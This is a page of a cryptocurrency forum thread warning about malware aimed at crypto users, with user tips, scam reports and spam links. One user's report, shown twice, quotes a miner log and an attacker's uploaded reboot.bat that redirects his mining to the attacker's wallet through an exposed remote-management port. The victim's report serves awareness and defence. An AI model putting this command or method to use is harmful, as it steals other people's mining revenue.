Topic: Beware of Increasingly Sophisticated Malware Infection Attempts - page 40. (Read 689408 times)
That's dangerous. Isn't there any precautions by forum Devs for such cyber attacks. It is easy to open ANN threads or any topic by anyone and thats freedom completely agreed. But what if shit are opened up by attackers everyday and we got victims everyday. This is not healthy for forum really.
Not all heroes wear capes.
Thank you very much.
Thank you very much.
Thanks a lot, great educational and eye opening post.
Could you please post the coin's name and maybe others that you may have found ?
Yes it is very helpful for the advancement of investing new coin
Thanks for sharing, wouldn't want to be that guy losing it all.
I am also getting some personal message from newbies asking skype and gmail id for better earning and some spam post more now a days even some links i checked its completely not secured
Just avoid to click on any suspicious URL or links/downloads should be enough.
I am also getting some personal message from newbies asking skype and gmail id for better earning and some spam post more now a days even some links i checked its completely not secured
Hi Security aware people who commented in here
Do you know if all the TOP20 blockchains have been tested just like bitcoin code has been or is there a risk that we discover that a network like maidsafecoin or Waves is a scam ?
Thanks for commenting your thoughts.
Victor
Do you know if all the TOP20 blockchains have been tested just like bitcoin code has been or is there a risk that we discover that a network like maidsafecoin or Waves is a scam ?
Thanks for commenting your thoughts.
Victor
there is a easy way to avoid this. Dont install every crypto coin that comes out and try their software if you dont fully understand their code or its not fully evaluated. Also dont run it on machines or networks where you have finances. Try to vmware/virtual box it before you add it to your massive list of altcoins you invest in.
I didn't even think that malware could possibly enter and do some harm here, Thanks OP this thread helps me more aware of malware. One time also I got victimized by malware and i didn't know where it came from, Sadly but more expenses to cure it.
Basically the user's caution is necessary to keep computer software safe
Could anyone answer this question for me? I do have Comodo's sandbox running on my computer. Would that be enough to protect me against the kinds of exploits that the op is referring to in this post, especially with respect to malicious file downloads? Thanks!
Anti-virus offer no protection for this but it's very easy to protect yourself :
Do not download anything from this forum.
Do not mine shitcoins on your main computer. Do not install shitcoins on your main computer.
Use a garbage computer with no personal information and not connected to your network for this shit and format it regularly.
I just want to make it clear that formatting regularly your computer isn't a good habit at all. You are just making the life span of your personal computer to become lesser but if you are going to do that with garbage computer that would fine and there's no need to worry about it. And for those people out there that can't help their fingers but to click suspicious links, always don't believe people who are posting some links.
Never Use a Wallet Hacked
Changing passwords is not a solution. Because of the possibility of all the private key in your wallet that has been hacked it is already known the hacker and private key can not be replaced.
Leave the wallet that has been hacked. Use the new wallet.
Changing passwords is not a solution. Because of the possibility of all the private key in your wallet that has been hacked it is already known the hacker and private key can not be replaced.
Leave the wallet that has been hacked. Use the new wallet.
this one is a scam .. gonna add this
April 28, 2017, 11:41:55 AM
I'm adding this to the list of possible scams:
Of which there are 2 lines
Which I have underlined
Of which there are 2 lines
Which I have underlined
Are you new to trading cryptocurrencies? Do you want to learn how to earn your slice in crypto riches?
Read our guides written by the Crypto Traders Room community, for FREE! And get your foot wet..
Guide on trading cryptocurrencies in general:
https://docs.google.com/document/d/1YgB5Jf1jbm8OzT9372ZqCkBnTQui6gkx0SICKq61Pv0/edit#
Guide on trading on margin (with leverage) on Poloniex exchange:
https://docs.google.com/document/d/1ex37eOVMCWJRHXLN6KLQcrMPsUbQw15jAFrLeO1aSUk/edit?usp=sharing
Join our chat room by following this link:
https://discord.gg/9h4kjAE
- be sure to check out Discord app on iOS or android
- preferred to use discord dekstop application for PC use rather than browser
Read our guides written by the Crypto Traders Room community, for FREE! And get your foot wet..
Guide on trading cryptocurrencies in general:
https://docs.google.com/document/d/1YgB5Jf1jbm8OzT9372ZqCkBnTQui6gkx0SICKq61Pv0/edit#
Guide on trading on margin (with leverage) on Poloniex exchange:
https://docs.google.com/document/d/1ex37eOVMCWJRHXLN6KLQcrMPsUbQw15jAFrLeO1aSUk/edit?usp=sharing
Join our chat room by following this link:
https://discord.gg/9h4kjAE
- be sure to check out Discord app on iOS or android
- preferred to use discord dekstop application for PC use rather than browser
April 18, 2017, 11:15:49 AM
This forum is being targeted heavily by malware developers because it's a quick target for people who have money in crypto. It's difficult to detect as you said because of crypters. It's not uncommon for them to spoof file extensions too. What looks like a .jpg could just be a hidden executable. Stay safe out there.
April 16, 2017, 08:25:40 PM
Does the malware affects desktop/laptop computer only? Does it affects iPhone/iOS user?
April 14, 2017, 09:20:27 AM
My ethmining is being hijacked.
Ok so this morning after waking up one of my rigs was mining on nicehash, but I was mining on miningpoolhub and didn't specify a failover. In my logs I discovered reboot.bat file was uploaded through ethman.exe and ran remotely.
I reckon that's why Claymore said in his readme:
"Warning: use negative option value or disable remote management entirely if you think that you can be attacked via this port!"
I had it on a positive number in order to manage, but how did a hacker get access over the internet to manage my miner. I consider myself paranoid careful and usually take all precautions. Is this a mistake on my side or is it just that easy to access someone's EthDcrMiner64 remotely? Does this mean files might be compromised or is it more like someone has my external IP, will a vpn make a difference? Any advice is appreciated.
I replaced my Claymore folder with a new one and made most files inside read-only, but how do I know I am not still compromised, how much access does this hacker have now and what should I do to ensure further safety? As you can see inside the reboot.bat file the hacker's bitcoin address: "1D8J2tkRbt5R7TNZKdBYdq8qx2aJDFqU1M" is busy stealing quite a nice sum of equihash at the moment.
02:00:08:453 6f2c Remote management: file reboot.bat was downloaded
02:00:08:454 6f2c srv bs: 0
02:00:08:454 6f2c sent: 40
02:00:09:231 17d8 GPU0 t=79C fan=32%, GPU1 t=79C fan=31%
xxxxxxxxx
xxxxxxxxx
xxxxxxxxx
02:00:09:887 397c ETH: 04/14/17-02:00:09 - New job from europe.ethash-
hub.miningpoolhub.com:17020
02:00:09:887 397c target: 0x0000000112e0be82 (diff: 4000MH), epoch #117
02:00:09:888 397c ETH - Total Speed: 53.104 Mh/s, Total Shares: 19, Rejected: 0, Time:
00:22
02:00:09:888 397c ETH: GPU0 26.859 Mh/s, GPU1 26.244 Mh/s
02:00:09:889 397c DCR - Total Speed: 1593.105 Mh/s, Total Shares: 123, Rejected: 1
02:00:09:889 397c DCR: GPU0 805.781 Mh/s, GPU1 787.324 Mh/s
02:00:10:231 406c recv: 73
02:00:10:232 406c srv pck: 73
02:00:10:232 406c Remote management: file reboot.bat was uploaded
02:00:10:232 406c srv bs: 0
02:00:10:233 406c sent: 682
02:00:10:604 7608 recv: 51
xxxxxxxxxx
02:00:13:363 689c Remote management required restart
02:00:13:364 689c Rebooting
02:00:13:377 4630 srv bs: 0
02:00:13:377 4630 sent: 210
==================reboot.bat========================
"C:\guiminer-scrypt_win32_binaries_v0.04\cgminer\Claymore-4.1\EthDcrMiner64.exe" -epool stratum
+tcp://daggerhashimoto.hk.nicehash.com:3353 -ewal 1D8J2tkRbt5R7TNZKdBYdq8qx2aJDFqU1M -epsw x -
esm 3 -allpools 1 -estale 0 -dpool stratum+tcp://decred.eu.nicehash.com:3354 -dwal
1D8J2tkRbt5R7TNZKdBYdq8qx2aJDFqU1M -dpsw x
Ok so this morning after waking up one of my rigs was mining on nicehash, but I was mining on miningpoolhub and didn't specify a failover. In my logs I discovered reboot.bat file was uploaded through ethman.exe and ran remotely.
I reckon that's why Claymore said in his readme:
"Warning: use negative option value or disable remote management entirely if you think that you can be attacked via this port!"
I had it on a positive number in order to manage, but how did a hacker get access over the internet to manage my miner. I consider myself paranoid careful and usually take all precautions. Is this a mistake on my side or is it just that easy to access someone's EthDcrMiner64 remotely? Does this mean files might be compromised or is it more like someone has my external IP, will a vpn make a difference? Any advice is appreciated.
I replaced my Claymore folder with a new one and made most files inside read-only, but how do I know I am not still compromised, how much access does this hacker have now and what should I do to ensure further safety? As you can see inside the reboot.bat file the hacker's bitcoin address: "1D8J2tkRbt5R7TNZKdBYdq8qx2aJDFqU1M" is busy stealing quite a nice sum of equihash at the moment.
02:00:08:453 6f2c Remote management: file reboot.bat was downloaded
02:00:08:454 6f2c srv bs: 0
02:00:08:454 6f2c sent: 40
02:00:09:231 17d8 GPU0 t=79C fan=32%, GPU1 t=79C fan=31%
xxxxxxxxx
xxxxxxxxx
xxxxxxxxx
02:00:09:887 397c ETH: 04/14/17-02:00:09 - New job from europe.ethash-
hub.miningpoolhub.com:17020
02:00:09:887 397c target: 0x0000000112e0be82 (diff: 4000MH), epoch #117
02:00:09:888 397c ETH - Total Speed: 53.104 Mh/s, Total Shares: 19, Rejected: 0, Time:
00:22
02:00:09:888 397c ETH: GPU0 26.859 Mh/s, GPU1 26.244 Mh/s
02:00:09:889 397c DCR - Total Speed: 1593.105 Mh/s, Total Shares: 123, Rejected: 1
02:00:09:889 397c DCR: GPU0 805.781 Mh/s, GPU1 787.324 Mh/s
02:00:10:231 406c recv: 73
02:00:10:232 406c srv pck: 73
02:00:10:232 406c Remote management: file reboot.bat was uploaded
02:00:10:232 406c srv bs: 0
02:00:10:233 406c sent: 682
02:00:10:604 7608 recv: 51
xxxxxxxxxx
02:00:13:363 689c Remote management required restart
02:00:13:364 689c Rebooting
02:00:13:377 4630 srv bs: 0
02:00:13:377 4630 sent: 210
==================reboot.bat========================
"C:\guiminer-scrypt_win32_binaries_v0.04\cgminer\Claymore-4.1\EthDcrMiner64.exe" -epool stratum
+tcp://daggerhashimoto.hk.nicehash.com:3353 -ewal 1D8J2tkRbt5R7TNZKdBYdq8qx2aJDFqU1M -epsw x -
esm 3 -allpools 1 -estale 0 -dpool stratum+tcp://decred.eu.nicehash.com:3354 -dwal
1D8J2tkRbt5R7TNZKdBYdq8qx2aJDFqU1M -dpsw x
April 13, 2017, 08:09:46 PM
I didn't even think that malware could possibly enter and do some harm here, Thanks OP this thread helps me more aware of malware. One time also I got victimized by malware and i didn't know where it came from, Sadly but more expenses to cure it.
Bitcoin User are definetely targets for hackers, especially for script kiddies, hobby hackers, and semi professional hackers.
You know it.. and so did "Satoshi"..
He/ they are cryptoFIAT banking on it. (pun intended)
April 06, 2017, 05:31:22 AM
I recommend using Linux for any PC running a full node, Linux is much more secure than windows.
The safe way of doing this is to create a special account for the node, and make sure that wallet.dat can only be read by the owner, not others, not the group, only the owner of the account.
Then create a separate account for your regular usage, that way in the event that you do get a virus, the virus would run under the ownership of the account that got the virus, and not under the ownership of the account that runs the full node, this way your bitcoins, litecoins, dash, etc they will be safe.
For extra security Trezor and Ledger Nano S are the best.
Both are great hardware wallets, and both have features that are missing on the other wallet, trezor has support for a password manager, and ledger has support for litecoins.
I recommend to have both, for traveling by plane the Ledger has the advantage that looks like a usb stick.
The safe way of doing this is to create a special account for the node, and make sure that wallet.dat can only be read by the owner, not others, not the group, only the owner of the account.
Then create a separate account for your regular usage, that way in the event that you do get a virus, the virus would run under the ownership of the account that got the virus, and not under the ownership of the account that runs the full node, this way your bitcoins, litecoins, dash, etc they will be safe.
For extra security Trezor and Ledger Nano S are the best.
Both are great hardware wallets, and both have features that are missing on the other wallet, trezor has support for a password manager, and ledger has support for litecoins.
I recommend to have both, for traveling by plane the Ledger has the advantage that looks like a usb stick.
April 02, 2017, 08:25:47 AM
I didn't even think that malware could possibly enter and do some harm here, Thanks OP this thread helps me more aware of malware. One time also I got victimized by malware and i didn't know where it came from, Sadly but more expenses to cure it.
Bitcoin User are definetely targets for hackers, especially for script kiddies, hobby hackers, and semi professional hackers.
Jump to: